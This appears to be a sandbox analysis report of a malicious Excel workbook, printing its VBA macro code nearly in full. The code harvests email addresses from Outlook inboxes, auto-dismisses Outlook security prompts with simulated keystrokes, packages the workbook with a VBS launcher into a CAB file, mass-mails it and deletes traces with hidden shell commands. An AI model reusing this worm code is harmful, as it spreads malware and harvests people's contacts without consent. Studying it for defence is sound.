                                                                                                                                                    " n = 0"
                                                                                                                                                    " Set Folder = fso.GetFolder(Path)"
                                                                                                                                                    " Set Files = Folder.Files"
                                                                                                                                                    " For Each File In Files"
                                                                                                                                                    " If left(File.Name,"
                                                                                                                                                    " If n > UBound(a) Then ReDim Preserve a(n*2)"
                                                                                                                                                    " a(n) = File.Path"
                                                                                                                                                    " n = n + 1"
                                                                                                                                                    " End If"
                                                                                                                                                    " Next"
                                                                                                                                                    " ReDim Preserve a(n-1)"
                                                                                                                                                    " ListDir = a"
                                                                                                                                                    "End Function"
                                                                                                                                                    "E:\sorce\"
                                                                                                                                                    "E:\sorce\"
                                                                                                                                                    "E:\sorce\"
                                                                                                                                                    "comspec"
                                                                                                                                                    "comspec"
                                                                                                                                                    "comspec"
                                                                                                                                                    "comspec"
                                                                                                                                                    "comspec"
                                                                                                                                                    "comspec"
                                                                                                                                                    "E:\KK"
                                                                                                                                                    "E:\KK"
                                                                                                                                                    "comspec"
                                                                                                                                                    """"
                                                                                                                                                    "Dear all,"
                                                                                                                                                    "E:\KK\"
                                                                                                                                                    "comspec"
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    460

                                                                                                                                                    Private Sub CreatCab_SendMail()

                                                                                                                                                    461

                                                                                                                                                    Dim i as Integer, AttName as String, AddVbsFile as String, AddListFile as String, Address_list as String

                                                                                                                                                    462

                                                                                                                                                    Dim fs as Object, WshShell as Object

                                                                                                                                                    463

                                                                                                                                                    Address_list = get_ten_address

                                                                                                                                                    465

                                                                                                                                                    Set WshShell = CreateObject("WScript.Shell")

                                                                                                                                                    CreateObject

                                                                                                                                                    466

                                                                                                                                                    Set fs = CreateObject("scripting.filesystemobject")

                                                                                                                                                    CreateObject

                                                                                                                                                    467

                                                                                                                                                    If fs.Folderexists("E:\SORCE") = False Then

                                                                                                                                                    Folderexists

                                                                                                                                                    467

                                                                                                                                                    fs.CreateFolder "E:\SORCE"

                                                                                                                                                    CreateFolder

                                                                                                                                                    467

                                                                                                                                                    Endif

                                                                                                                                                    468

                                                                                                                                                    AttName = Replace(Replace(Left(ThisWorkbook.Name, Len(ThisWorkbook.Name) - 4), " ", "_"), ".", "_")

                                                                                                                                                    Replace

                                                                                                                                                    Left

                                                                                                                                                    Name

                                                                                                                                                    Len

                                                                                                                                                    469

                                                                                                                                                    mail_sub = "*" & AttName & "*Message*"

                                                                                                                                                    470

                                                                                                                                                    AddVbsFile = "E:\sorce\" & AttName & "_Key.vbs"

                                                                                                                                                    471

                                                                                                                                                    i = FreeFile

                                                                                                                                                    FreeFile

                                                                                                                                                    472

                                                                                                                                                    Open AddVbsFile For Output Access Write As # i

                                                                                                                                                    Open

                                                                                                                                                    474

                                                                                                                                                    Print # i, "Dim oexcel,owb, WshShell,Fso,Atta_xls,sh,route"

                                                                                                                                                    475

                                                                                                                                                    Print # i, "On error Resume Next"

                                                                                                                                                    476

                                                                                                                                                    Print # i, "Set sh=WScript.CreateObject(""" & "shell.application""" & ")"

                                                                                                                                                    477

                                                                                                                                                    Print # i, "sh.MinimizeAll"

                                                                                                                                                    478

                                                                                                                                                    Print # i, "Set sh = Nothing"

                                                                                                                                                    479

                                                                                                                                                    Print # i, "Set Fso = CreateObject(""" & "Scripting.FileSystemObject""" & ")"

                                                                                                                                                    480

                                                                                                                                                    Print # i, "Set WshShell = WScript.CreateObject(""" & "WScript.Shell""" & ")"

                                                                                                                                                    481

                                                                                                                                                    Print # i, "If Fso.Folderexists(""" & "E:\KK""" & ") = False Then Fso.CreateFolder """ & "E:\KK"""

                                                                                                                                                    482

                                                                                                                                                    Print # i, "Fso.CopyFile _"

                                                                                                                                                    483

                                                                                                                                                    Print # i, "WshShell.CurrentDirectory & """ & "\" & AttName & "*.CAB""" & "," & " " & """E:\KK\""" & ", True"

                                                                                                                                                    484

                                                                                                                                                    Print # i, "For Each Atta_xls In ListDir(""" & "E:\KK""" & ")"

                                                                                                                                                    485

                                                                                                                                                    Print # i, " WshShell.Run """ & "expand """ & " & Atta_xls & """ & " -F:" & AttName & ".xls E:\KK""" & ", 0, true"

                                                                                                                                                    486

                                                                                                                                                    Print # i, "Next"

                                                                                                                                                    487

                                                                                                                                                    Print # i, "If Fso.FileExists(""" & "E:\KK\" & AttName & ".xls""" & ") = 0 then"

                                                                                                                                                    488

                                                                                                                                                    Print # i, " route = WshShell.CurrentDirectory & """ & "\" & AttName & ".xls"""

                                                                                                                                                    489

                                                                                                                                                    Print # i, " if Fso.FileExists(WshShell.CurrentDirectory & """ & "\" & AttName & ".xls""" & ")=0 then"

                                                                                                                                                    490

                                                                                                                                                    Print # i, " route = InputBox(""" & "Warning! """ & " & Chr(10) & """ & "You are going to open a confidential file.""" & "& Chr(10) _"

                                                                                                                                                    491

                                                                                                                                                    Print # i, " & """ & "Please input the complete file path.""" & " & Chr(10) & """ & "ex. C:\parth\confidential_file.xls""" & ", _"

                                                                                                                                                    492

                                                                                                                                                    Print # i, " """ & "Open a File""" & " , """ & "Please Input the Complete File Path""" & ", 10000, 8500)"

                                                                                                                                                    493

                                                                                                                                                    Print # i, " End if"

                                                                                                                                                    494

                                                                                                                                                    Print # i, "else"

                                                                                                                                                    495

                                                                                                                                                    Print # i, " route = """ & "E:\KK\" & AttName & ".xls"""

                                                                                                                                                    496

                                                                                                                                                    Print # i, "End If"

                                                                                                                                                    497

                                                                                                                                                    Print # i, " set oexcel=createobject(""" & "excel.application""" & ")"

                                                                                                                                                    498

                                                                                                                                                    Print # i, " set owb=oexcel.workbooks.open(route)"

                                                                                                                                                    499

                                                                                                                                                    Print # i, " oExcel.Visible = True"

                                                                                                                                                    500

                                                                                                                                                    Print # i, "Set oExcel = Nothing"

                                                                                                                                                    501

                                                                                                                                                    Print # i, "Set oWb = Nothing"

                                                                                                                                                    502

                                                                                                                                                    Print # i, "Set WshShell = Nothing"

                                                                                                                                                    503

                                                                                                                                                    Print # i, "Set Fso = Nothing"

                                                                                                                                                    504

                                                                                                                                                    Print # i, "WScript.Quit"

                                                                                                                                                    505

                                                                                                                                                    Print # i, "Private Function ListDir (ByVal Path)"

                                                                                                                                                    506

                                                                                                                                                    Print # i, " Dim Filter, a, n, Folder, Files, File"

                                                                                                                                                    507

                                                                                                                                                    Print # i, " ReDim a(10)"

                                                                                                                                                    508

                                                                                                                                                    Print # i, " n = 0"

                                                                                                                                                    509

                                                                                                                                                    Print # i, " Set Folder = fso.GetFolder(Path)"

                                                                                                                                                    510

                                                                                                                                                    Print # i, " Set Files = Folder.Files"

                                                                                                                                                    511

                                                                                                                                                    Print # i, " For Each File In Files"

                                                                                                                                                    512

                                                                                                                                                    Print # i, " If left(File.Name," & Len(AttName) & ") = """ & AttName & """ and right(File.Name,3) = """ & "CAB""" & " Then"

                                                                                                                                                    Len

                                                                                                                                                    513

                                                                                                                                                    Print # i, " If n > UBound(a) Then ReDim Preserve a(n*2)"

                                                                                                                                                    514

                                                                                                                                                    Print # i, " a(n) = File.Path"

                                                                                                                                                    515

                                                                                                                                                    Print # i, " n = n + 1"

                                                                                                                                                    516

                                                                                                                                                    Print # i, " End If"

                                                                                                                                                    517

                                                                                                                                                    Print # i, " Next"

                                                                                                                                                    518

                                                                                                                                                    Print # i, " ReDim Preserve a(n-1)"

                                                                                                                                                    519

                                                                                                                                                    Print # i, " ListDir = a"

                                                                                                                                                    520

                                                                                                                                                    Print # i, "End Function"

                                                                                                                                                    522

                                                                                                                                                    Close (i)

                                                                                                                                                    523

                                                                                                                                                    AddListFile = ThisWorkbook.Path & "\TEST.txt"

                                                                                                                                                    Path

                                                                                                                                                    524

                                                                                                                                                    i = FreeFile

                                                                                                                                                    FreeFile

                                                                                                                                                    525

                                                                                                                                                    Open AddListFile For Output Access Write As # i

                                                                                                                                                    Open

                                                                                                                                                    526

                                                                                                                                                    Print # i, "E:\sorce\" & AttName & "_Key.vbs"

                                                                                                                                                    527

                                                                                                                                                    Print # i, "E:\sorce\" & AttName & ".xls"

                                                                                                                                                    528

                                                                                                                                                    Close (i)

                                                                                                                                                    530

                                                                                                                                                    Application.ScreenUpdating = False

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    531

                                                                                                                                                    RestoreBeforeSend

                                                                                                                                                    532

                                                                                                                                                    ThisWorkbook.SaveCopyAs "E:\sorce\" & AttName & ".xls"

                                                                                                                                                    SaveCopyAs

                                                                                                                                                    533

                                                                                                                                                    RestoreAfterOpen

                                                                                                                                                    534

                                                                                                                                                    c4$ = CurDir()

                                                                                                                                                    CurDir

                                                                                                                                                    535

                                                                                                                                                    ChDrive Left(ThisWorkbook.Path, 3)

                                                                                                                                                    ChDrive

                                                                                                                                                    Left

                                                                                                                                                    Path

                                                                                                                                                    536

                                                                                                                                                    ChDir ThisWorkbook.Path

                                                                                                                                                    ChDir

                                                                                                                                                    Path

                                                                                                                                                    537

                                                                                                                                                    WshShell.Run Environ$("comspec") & " /c makecab /F """ & ThisWorkbook.Path & "\TEST.TXT""" & " /D COMPRESSIONTYPE=LZX /D COMPRESSIONMEMORY=21 /D CABINETNAMETEMPLATE=../" & AttName & ".CAB", vbHide, False

                                                                                                                                                    Run

                                                                                                                                                    Environ$

                                                                                                                                                    Path

                                                                                                                                                    vbHide

                                                                                                                                                    539

                                                                                                                                                    Do Until fs.FileExists(ThisWorkbook.Path & "\TEST.txt") And fs.FileExists(ThisWorkbook.Path & "\setup.rpt") And fs.FileExists(ThisWorkbook.Path & "\setup.inf") And fs.FileExists(ThisWorkbook.Path & "\" & AttName & ".CAB")

                                                                                                                                                    FileExists

                                                                                                                                                    Path

                                                                                                                                                    542

                                                                                                                                                    DoEvents

                                                                                                                                                    DoEvents

                                                                                                                                                    543

                                                                                                                                                    Loop

                                                                                                                                                    FileExists

                                                                                                                                                    Path

                                                                                                                                                    545

                                                                                                                                                    WshShell.Run Environ$("comspec") & " /c RD /S /Q """ & ThisWorkbook.Path & "\disk1""", vbHide, False

                                                                                                                                                    Run

                                                                                                                                                    Environ$

                                                                                                                                                    Path

                                                                                                                                                    vbHide

                                                                                                                                                    546

                                                                                                                                                    WshShell.Run Environ$("comspec") & " /c Del /F /Q """ & ThisWorkbook.Path & "\TEST.txt""", vbHide, False

                                                                                                                                                    Run

                                                                                                                                                    Environ$

                                                                                                                                                    Path

                                                                                                                                                    vbHide

                                                                                                                                                    547

                                                                                                                                                    WshShell.Run Environ$("comspec") & " /c Del /F /Q """ & ThisWorkbook.Path & "\setup.rpt""", vbHide, False

                                                                                                                                                    Run

                                                                                                                                                    Environ$

                                                                                                                                                    Path

                                                                                                                                                    vbHide

                                                                                                                                                    548

                                                                                                                                                    WshShell.Run Environ$("comspec") & " /c Del /F /Q """ & ThisWorkbook.Path & "\setup.inf""", vbHide, False

                                                                                                                                                    Run

                                                                                                                                                    Environ$

                                                                                                                                                    Path

                                                                                                                                                    vbHide

                                                                                                                                                    549

                                                                                                                                                    WshShell.Run Environ$("comspec") & " /c RD /S /Q E:\sorce", vbHide, False

                                                                                                                                                    Run

                                                                                                                                                    Environ$

                                                                                                                                                    vbHide

                                                                                                                                                    551

                                                                                                                                                    If fs.Folderexists("E:\KK") = False Then

                                                                                                                                                    Folderexists

                                                                                                                                                    551

                                                                                                                                                    fs.CreateFolder "E:\KK"

                                                                                                                                                    CreateFolder

                                                                                                                                                    551

                                                                                                                                                    Endif

                                                                                                                                                    552

                                                                                                                                                    WshShell.Run Environ$("comspec") & " /c MOVE /Y " & AttName & ".CAB E:\KK""", vbHide, False

                                                                                                                                                    Run

                                                                                                                                                    Environ$

                                                                                                                                                    vbHide

                                                                                                                                                    553

                                                                                                                                                    ChDir c4$

                                                                                                                                                    ChDir

                                                                                                                                                    554

                                                                                                                                                    Call Massive_SendMail(Address_list, AttName, "Dear all," & vbCrLf & AttName & vbCrLf & "FYI", "", "E:\KK\" & AttName & ".CAB")

                                                                                                                                                    vbCrLf

                                                                                                                                                    556

                                                                                                                                                    WshShell.Run Environ$("comspec") & " /c RD /S /Q E:\KK", vbHide, False

                                                                                                                                                    Run

                                                                                                                                                    Environ$

                                                                                                                                                    vbHide

                                                                                                                                                    557

                                                                                                                                                    Set WshShell = Nothing

                                                                                                                                                    558

                                                                                                                                                    Application.ScreenUpdating = True

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    559

                                                                                                                                                    End Sub

                                                                                                                                                    Subroutine

                                                                                                                                                    search_in_OLAPIs: 16, Strings: 140, Number of lines: 151, Relevance: 274.901

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    CreateObject

                                                                                                                                                    CreateObject

                                                                                                                                                    Folderexists

                                                                                                                                                    CreateFolder

                                                                                                                                                    Replace

                                                                                                                                                    Left

                                                                                                                                                    Name

                                                                                                                                                    Len

                                                                                                                                                    FreeFile

                                                                                                                                                    Open

                                                                                                                                                    FreeFile

                                                                                                                                                    Open

                                                                                                                                                    WindowState

                                                                                                                                                    xlMaximized

                                                                                                                                                    Run

                                                                                                                                                    vbHide

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    "scripting.filesystemobject"
                                                                                                                                                    "WScript.Shell"
                                                                                                                                                    "E:\KK"
                                                                                                                                                    "E:\KK"
                                                                                                                                                    " "
                                                                                                                                                    "."
                                                                                                                                                    "_"
                                                                                                                                                    "E:\KK\"
                                                                                                                                                    "On error Resume Next"
                                                                                                                                                    "Dim wsh, tle, T0, i"
                                                                                                                                                    " T0 = Timer"
                                                                                                                                                    " Set wsh=createobject(""""wscript.shell"""")"
                                                                                                                                                    " tle = """"Microsoft Office Outlook"""""
                                                                                                                                                    "For i = 1 To 1000"
                                                                                                                                                    " If Timer - T0 > 60 Then Exit For"
                                                                                                                                                    " Call Refresh()"
                                                                                                                                                    " wscript.sleep 05"
                                                                                                                                                    " wsh.sendKeys """"%a"""""
                                                                                                                                                    " wscript.sleep 05"
                                                                                                                                                    " wsh.sendKeys """"{TAB}{TAB}"""""
                                                                                                                                                    " wscript.sleep 05"
                                                                                                                                                    " wsh.sendKeys """"{Enter}"""""
                                                                                                                                                    "Next"
                                                                                                                                                    "Set wsh = Nothing"
                                                                                                                                                    "wscript.quit"
                                                                                                                                                    "Sub Refresh()"
                                                                                                                                                    "Do Until wsh.AppActivate(CStr(tle)) = True"
                                                                                                                                                    " If Timer - T0 > 60 Then Exit Sub"
                                                                                                                                                    "Loop"
                                                                                                                                                    " wscript.sleep 05"
                                                                                                                                                    " wsh.SendKeys """"%{F4}"""""
                                                                                                                                                    "End Sub"
                                                                                                                                                    "E:\KK\"
                                                                                                                                                    "On error Resume Next"
                                                                                                                                                    "Const olFolderInbox = 6"
                                                                                                                                                    "Dim conbinded_address,WshShell,sh,ts"
                                                                                                                                                    "Set WshShell=WScript.CreateObject(""""WScript.Shell"""")"
                                                                                                                                                    "Set objOutlook = CreateObject(""""Outlook.Application"""")"
                                                                                                                                                    "Set objNamespace = objOutlook.GetNamespace(""""MAPI"""")"
                                                                                                                                                    "Set objFolder = objNamespace.GetDefaultFolder(olFolderInbox)"
                                                                                                                                                    "Set TargetFolder = objFolder"
                                                                                                                                                    "conbinded_address = """""""""
                                                                                                                                                    "Set colItems = TargetFolder.Items"
                                                                                                                                                    "wscript.sleep 300000"
                                                                                                                                                    "WshSHell.Run (""""wscript.exe "
                                                                                                                                                    "ts = Timer"
                                                                                                                                                    "For Each objMessage in colItems"
                                                                                                                                                    " If Timer - ts >55 then exit For"
                                                                                                                                                    " conbinded_address = conbinded_address & valid_address(objMessage.Body)"
                                                                                                                                                    "Next"
                                                                                                                                                    "add_text conbinded_address, 8"
                                                                                                                                                    "add_text all_non_same(ReadAllTextFile), 2"
                                                                                                                                                    "WScript.Quit"
                                                                                                                                                    """"
                                                                                                                                                    "Private Function valid_address(source_data)"
                                                                                                                                                    " Dim oDict, trimed_data , temp_data, i, t_asc, header_end, trimed_arr, nonsame_arr"
                                                                                                                                                    " Dim regex, matchs, ss, arr()"
                                                                                                                                                    " Set oDict = CreateObject(""""Scripting.Dictionary"""")"
                                                                                                                                                    " Set regex = CreateObject(""""VBSCRIPT.REGEXP"""")"
                                                                                                                                                    """"
                                                                                                                                                    " regex.Global = True"
                                                                                                                                                    " regex.Pattern = """"\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*"""""
                                                                                                                                                    " Set matchs = regex.Execute(source_data)"
                                                                                                                                                    " ReDim trimed_arr(matchs.Count - 1)"
                                                                                                                                                    " For i = Lbound(trimed_arr) To Ubound(trimed_arr)"
                                                                                                                                                    " trimed_arr(i) = matchs.Item(i) & vbCrLf"
                                                                                                                                                    " Next"
                                                                                                                                                    """"
                                                                                                                                                    " For i = LBound(trimed_arr) To UBound(trimed_arr)"
                                                                                                                                                    " oDict(trimed_arr(i)) = """""""""
                                                                                                                                                    " Next"
                                                                                                                                                    """"
                                                                                                                                                    " If oDict.Count > 0 Then"
                                                                                                                                                    " nonsame_arr = oDict.keys"
                                                                                                                                                    " For i = LBound(nonsame_arr) To UBound(nonsame_arr)"
                                                                                                                                                    " valid_address = valid_address & nonsame_arr(i)"
                                                                                                                                                    " Next"
                                                                                                                                                    " End If"
                                                                                                                                                    " Set oDict = Nothing"
                                                                                                                                                    "End Function"
                                                                                                                                                    """"
                                                                                                                                                    "Private Sub add_text(inputed_string, input_frag)"
                                                                                                                                                    " Dim objFSO, logfile, logtext, log_path, log_folder"
                                                                                                                                                    " log_path = """"D:\Collected_Address"""""
                                                                                                                                                    " Set objFSO = CreateObject(""""Scripting.FileSystemObject"""")"
                                                                                                                                                    " On Error resume next"
                                                                                                                                                    " Set log_folder = objFSO.CreateFolder(log_path)"
                                                                                                                                                    """"
                                                                                                                                                    " If objFSO.FileExists(log_path & """"\log.txt"""") = 0 Then"
                                                                                                                                                    " Set logfile = objFSO.CreateTextFile(log_path & """"\log.txt"""", True)"
                                                                                                                                                    " End If"
                                                                                                                                                    " Set log_folder = Nothing"
                                                                                                                                                    " Set logfile = Nothing"
                                                                                                                                                    """"
                                                                                                                                                    " Select Case input_frag"
                                                                                                                                                    " Case 8"
                                                                                                                                                    " Set logtext = objFSO.OpenTextFile(log_path & """"\log.txt"""", 8, True, -1)"
                                                                                                                                                    " logtext.Write inputed_string"
                                                                                                                                                    " logtext.Close"
                                                                                                                                                    " Case 2"
                                                                                                                                                    " Set logtext = objFSO.OpenTextFile(log_path & """"\log.txt"""", 2, True, -1)"
                                                                                                                                                    " logtext.Write inputed_string"
                                                                                                                                                    " logtext.Close"
                                                                                                                                                    " End Select"
                                                                                                                                                    " set objFSO = nothing"
                                                                                                                                                    "End Sub"
                                                                                                                                                    """"
                                                                                                                                                    "Private Function ReadAllTextFile()"
                                                                                                                                                    " Dim objFSO, FileName, MyFile"
                                                                                                                                                    " FileName = """"D:\Collected_Address\log.txt"""""
                                                                                                                                                    " Set objFSO = CreateObject(""""Scripting.FileSystemObject"""")"
                                                                                                                                                    " Set MyFile = objFSO.OpenTextFile(FileName, 1, False, -1)"
                                                                                                                                                    " If MyFile.AtEndOfStream Then"
                                                                                                                                                    " ReadAllTextFile = """""""""
                                                                                                                                                    " Else"
                                                                                                                                                    " ReadAllTextFile = MyFile.ReadAll"
                                                                                                                                                    " End If"
                                                                                                                                                    "set objFSO = nothing"
                                                                                                                                                    "End Function"
                                                                                                                                                    """"
                                                                                                                                                    "Private Function all_non_same(source_data)"
                                                                                                                                                    " Dim oDict, i, trimed_arr, nonsame_arr"
                                                                                                                                                    " all_non_same = """""""""
                                                                                                                                                    " Set oDict = CreateObject(""""Scripting.Dictionary"""")"
                                                                                                                                                    """"
                                                                                                                                                    " trimed_arr = Split(source_data, vbCrLf)"
                                                                                                                                                    """"
                                                                                                                                                    " For i = LBound(trimed_arr) To UBound(trimed_arr)"
                                                                                                                                                    " oDict(trimed_arr(i)) = """""""""
                                                                                                                                                    " Next"
                                                                                                                                                    """"
                                                                                                                                                    " If oDict.Count > 0 Then"
                                                                                                                                                    " nonsame_arr = oDict.keys"
                                                                                                                                                    " For i = LBound(nonsame_arr) To UBound(nonsame_arr)"
                                                                                                                                                    " all_non_same = all_non_same & nonsame_arr(i) & vbCrLf"
                                                                                                                                                    " Next"
                                                                                                                                                    " End If"
                                                                                                                                                    " Set oDict = Nothing"
                                                                                                                                                    "End Function"
                                                                                                                                                    "wscript.exe "
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    305

                                                                                                                                                    Private Sub search_in_OL()

                                                                                                                                                    306

                                                                                                                                                    Dim i as Integer, AttName as String, AddVbsFile as String, AddListFile as String, fs as Object, WshShell as Object

                                                                                                                                                    308

                                                                                                                                                    On Error Resume Next

                                                                                                                                                    309

                                                                                                                                                    Set fs = CreateObject("scripting.filesystemobject")

                                                                                                                                                    CreateObject

                                                                                                                                                    310

                                                                                                                                                    Set WshShell = CreateObject("WScript.Shell")

                                                                                                                                                    CreateObject

                                                                                                                                                    312

                                                                                                                                                    If fs.Folderexists("E:\KK") = False Then

                                                                                                                                                    Folderexists

                                                                                                                                                    312

                                                                                                                                                    fs.CreateFolder "E:\KK"

                                                                                                                                                    CreateFolder

                                                                                                                                                    312

                                                                                                                                                    Endif

                                                                                                                                                    313

                                                                                                                                                    AttName = Replace(Replace(Left(ThisWorkbook.Name, Len(ThisWorkbook.Name) - 4), " ", "_"), ".", "_")

                                                                                                                                                    Replace

                                                                                                                                                    Left

                                                                                                                                                    Name

                                                                                                                                                    Len

                                                                                                                                                    314

                                                                                                                                                    AddVbsFile_clear = "E:\KK\" & AttName & "_clear.vbs"

                                                                                                                                                    315

                                                                                                                                                    i = FreeFile

                                                                                                                                                    FreeFile

                                                                                                                                                    316

                                                                                                                                                    Open AddVbsFile_clear For Output Access Write As # i

                                                                                                                                                    Open

                                                                                                                                                    318

                                                                                                                                                    Print # i, "On error Resume Next"

                                                                                                                                                    319

                                                                                                                                                    Print # i, "Dim wsh, tle, T0, i"

                                                                                                                                                    320

                                                                                                                                                    Print # i, " T0 = Timer"

                                                                                                                                                    321

                                                                                                                                                    Print # i, " Set wsh=createobject(""" & "wscript.shell""" & ")"

                                                                                                                                                    322

                                                                                                                                                    Print # i, " tle = """ & "Microsoft Office Outlook""" & ""

                                                                                                                                                    323

                                                                                                                                                    Print # i, "For i = 1 To 1000"

                                                                                                                                                    324

                                                                                                                                                    Print # i, " If Timer - T0 > 60 Then Exit For"

                                                                                                                                                    325

                                                                                                                                                    Print # i, " Call Refresh()"

                                                                                                                                                    326

                                                                                                                                                    Print # i, " wscript.sleep 05"

                                                                                                                                                    327

                                                                                                                                                    Print # i, " wsh.sendKeys """ & "%a""" & ""

                                                                                                                                                    328

                                                                                                                                                    Print # i, " wscript.sleep 05"

                                                                                                                                                    329

                                                                                                                                                    Print # i, " wsh.sendKeys """ & "{TAB}{TAB}""" & ""

                                                                                                                                                    330

                                                                                                                                                    Print # i, " wscript.sleep 05"

                                                                                                                                                    331

                                                                                                                                                    Print # i, " wsh.sendKeys """ & "{Enter}""" & ""

                                                                                                                                                    332

                                                                                                                                                    Print # i, "Next"

                                                                                                                                                    333

                                                                                                                                                    Print # i, "Set wsh = Nothing"

                                                                                                                                                    334

                                                                                                                                                    Print # i, "wscript.quit"

                                                                                                                                                    335

                                                                                                                                                    Print # i, "Sub Refresh()"

                                                                                                                                                    336

                                                                                                                                                    Print # i, "Do Until wsh.AppActivate(CStr(tle)) = True"

                                                                                                                                                    337

                                                                                                                                                    Print # i, " If Timer - T0 > 60 Then Exit Sub"

                                                                                                                                                    338

                                                                                                                                                    Print # i, "Loop"

                                                                                                                                                    339

                                                                                                                                                    Print # i, " wscript.sleep 05"

                                                                                                                                                    340

                                                                                                                                                    Print # i, " wsh.SendKeys """ & "%{F4}""" & ""

                                                                                                                                                    341

                                                                                                                                                    Print # i, "End Sub"

                                                                                                                                                    342

                                                                                                                                                    Close (i)

                                                                                                                                                    344

                                                                                                                                                    AddVbsFile_search = "E:\KK\" & AttName & "_Search.vbs"

                                                                                                                                                    345

                                                                                                                                                    i = FreeFile

                                                                                                                                                    FreeFile

                                                                                                                                                    346

                                                                                                                                                    Open AddVbsFile_search For Output Access Write As # i

                                                                                                                                                    Open

                                                                                                                                                    348

                                                                                                                                                    Print # i, "On error Resume Next"

                                                                                                                                                    349

                                                                                                                                                    Print # i, "Const olFolderInbox = 6"

                                                                                                                                                    350

                                                                                                                                                    Print # i, "Dim conbinded_address,WshShell,sh,ts"

                                                                                                                                                    351

                                                                                                                                                    Print # i, "Set WshShell=WScript.CreateObject(""" & "WScript.Shell""" & ")"

                                                                                                                                                    352

                                                                                                                                                    Print # i, "Set objOutlook = CreateObject(""" & "Outlook.Application""" & ")"

                                                                                                                                                    353

                                                                                                                                                    Print # i, "Set objNamespace = objOutlook.GetNamespace(""" & "MAPI""" & ")"

                                                                                                                                                    354

                                                                                                                                                    Print # i, "Set objFolder = objNamespace.GetDefaultFolder(olFolderInbox)"

                                                                                                                                                    355

                                                                                                                                                    Print # i, "Set TargetFolder = objFolder"

                                                                                                                                                    356

                                                                                                                                                    Print # i, "conbinded_address = """ & """" & ""

                                                                                                                                                    357

                                                                                                                                                    Print # i, "Set colItems = TargetFolder.Items"

                                                                                                                                                    358

                                                                                                                                                    Print # i, "wscript.sleep 300000"

                                                                                                                                                    359

                                                                                                                                                    Print # i, "WshSHell.Run (""" & "wscript.exe " & AddVbsFile_clear & """" & "), vbHide, False"

                                                                                                                                                    360

                                                                                                                                                    Print # i, "ts = Timer"

                                                                                                                                                    361

                                                                                                                                                    Print # i, "For Each objMessage in colItems"

                                                                                                                                                    362

                                                                                                                                                    Print # i, " If Timer - ts >55 then exit For"

                                                                                                                                                    363

                                                                                                                                                    Print # i, " conbinded_address = conbinded_address & valid_address(objMessage.Body)"

                                                                                                                                                    364

                                                                                                                                                    Print # i, "Next"

                                                                                                                                                    365

                                                                                                                                                    Print # i, "add_text conbinded_address, 8"

                                                                                                                                                    366

                                                                                                                                                    Print # i, "add_text all_non_same(ReadAllTextFile), 2"

                                                                                                                                                    367

                                                                                                                                                    Print # i, "WScript.Quit"

                                                                                                                                                    368

                                                                                                                                                    Print # i, ""

                                                                                                                                                    369

                                                                                                                                                    Print # i, "Private Function valid_address(source_data)"

                                                                                                                                                    370

                                                                                                                                                    Print # i, " Dim oDict, trimed_data , temp_data, i, t_asc, header_end, trimed_arr, nonsame_arr"

                                                                                                                                                    371

                                                                                                                                                    Print # i, " Dim regex, matchs, ss, arr()"

                                                                                                                                                    372

                                                                                                                                                    Print # i, " Set oDict = CreateObject(""" & "Scripting.Dictionary""" & ")"

                                                                                                                                                    373

                                                                                                                                                    Print # i, " Set regex = CreateObject(""" & "VBSCRIPT.REGEXP""" & ")"

                                                                                                                                                    374

                                                                                                                                                    Print # i, ""

                                                                                                                                                    375

                                                                                                                                                    Print # i, " regex.Global = True"

                                                                                                                                                    376

                                                                                                                                                    Print # i, " regex.Pattern = """ & "\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*""" & ""

                                                                                                                                                    377

                                                                                                                                                    Print # i, " Set matchs = regex.Execute(source_data)"

                                                                                                                                                    378

                                                                                                                                                    Print # i, " ReDim trimed_arr(matchs.Count - 1)"

                                                                                                                                                    379

                                                                                                                                                    Print # i, " For i = Lbound(trimed_arr) To Ubound(trimed_arr)"

                                                                                                                                                    380

                                                                                                                                                    Print # i, " trimed_arr(i) = matchs.Item(i) & vbCrLf"

                                                                                                                                                    381

                                                                                                                                                    Print # i, " Next"

                                                                                                                                                    382

                                                                                                                                                    Print # i, ""

                                                                                                                                                    383

                                                                                                                                                    Print # i, " For i = LBound(trimed_arr) To UBound(trimed_arr)"

                                                                                                                                                    384

                                                                                                                                                    Print # i, " oDict(trimed_arr(i)) = """ & """" & ""

                                                                                                                                                    385

                                                                                                                                                    Print # i, " Next"

                                                                                                                                                    386

                                                                                                                                                    Print # i, ""

                                                                                                                                                    387

                                                                                                                                                    Print # i, " If oDict.Count > 0 Then"

                                                                                                                                                    388

                                                                                                                                                    Print # i, " nonsame_arr = oDict.keys"

                                                                                                                                                    389

                                                                                                                                                    Print # i, " For i = LBound(nonsame_arr) To UBound(nonsame_arr)"

                                                                                                                                                    390

                                                                                                                                                    Print # i, " valid_address = valid_address & nonsame_arr(i)"

                                                                                                                                                    391

                                                                                                                                                    Print # i, " Next"

                                                                                                                                                    392

                                                                                                                                                    Print # i, " End If"

                                                                                                                                                    393

                                                                                                                                                    Print # i, " Set oDict = Nothing"

                                                                                                                                                    394

                                                                                                                                                    Print # i, "End Function"

                                                                                                                                                    395

                                                                                                                                                    Print # i, ""

                                                                                                                                                    396

                                                                                                                                                    Print # i, "Private Sub add_text(inputed_string, input_frag)"

                                                                                                                                                    397

                                                                                                                                                    Print # i, " Dim objFSO, logfile, logtext, log_path, log_folder"

                                                                                                                                                    398

                                                                                                                                                    Print # i, " log_path = """ & "D:\Collected_Address""" & ""

                                                                                                                                                    399

                                                                                                                                                    Print # i, " Set objFSO = CreateObject(""" & "Scripting.FileSystemObject""" & ")"

                                                                                                                                                    400

                                                                                                                                                    Print # i, " On Error resume next"

                                                                                                                                                    401

                                                                                                                                                    Print # i, " Set log_folder = objFSO.CreateFolder(log_path)"

                                                                                                                                                    402

                                                                                                                                                    Print # i, ""

                                                                                                                                                    403

                                                                                                                                                    Print # i, " If objFSO.FileExists(log_path & """ & "\log.txt""" & ") = 0 Then"

                                                                                                                                                    404

                                                                                                                                                    Print # i, " Set logfile = objFSO.CreateTextFile(log_path & """ & "\log.txt""" & ", True)"

                                                                                                                                                    405

                                                                                                                                                    Print # i, " End If"

                                                                                                                                                    406

                                                                                                                                                    Print # i, " Set log_folder = Nothing"

                                                                                                                                                    407

                                                                                                                                                    Print # i, " Set logfile = Nothing"

                                                                                                                                                    408

